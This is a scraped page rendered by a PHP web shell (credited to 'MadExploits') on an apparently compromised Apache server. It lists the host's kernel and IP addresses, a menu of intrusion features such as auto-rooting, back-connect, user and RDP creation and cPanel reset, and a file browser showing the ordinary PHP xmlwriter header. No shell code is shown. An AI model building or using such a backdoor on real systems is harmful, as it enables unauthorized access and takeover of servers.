Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.188.59.124
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
80 /
src /
ext /
xmlwriter /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
42
B
-rw-r--r--
config.m4
515
B
-rw-r--r--
config.w32
552
B
-rw-r--r--
php_xmlwriter.c
25.73
KB
-rw-r--r--
php_xmlwriter.h
1.77
KB
-rw-r--r--
php_xmlwriter.stub.php
9.3
KB
-rw-r--r--
php_xmlwriter_arginfo.h
22.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_xmlwriter.h
/* +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt. | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Rob Richards <rrichards@php.net> | | Pierre-A. Joye <pajoye@php.net> | +----------------------------------------------------------------------+ */ #ifndef PHP_XMLWRITER_H #define PHP_XMLWRITER_H extern zend_module_entry xmlwriter_module_entry; #define phpext_xmlwriter_ptr &xmlwriter_module_entry #include "php_version.h" #define PHP_XMLWRITER_VERSION PHP_VERSION #ifdef ZTS #include "TSRM.h" #endif #include <libxml/tree.h> #include <libxml/xmlwriter.h> #include <libxml/uri.h> /* Extends zend object */ typedef struct _ze_xmlwriter_object { xmlTextWriterPtr ptr; xmlBufferPtr output; zend_object std; } ze_xmlwriter_object; static inline ze_xmlwriter_object *php_xmlwriter_fetch_object(zend_object *obj) { return (ze_xmlwriter_object *)((char*)(obj) - XtOffsetOf(ze_xmlwriter_object, std)); } #define Z_XMLWRITER_P(zv) php_xmlwriter_fetch_object(Z_OBJ_P((zv))) #endif /* PHP_XMLWRITER_H */
Close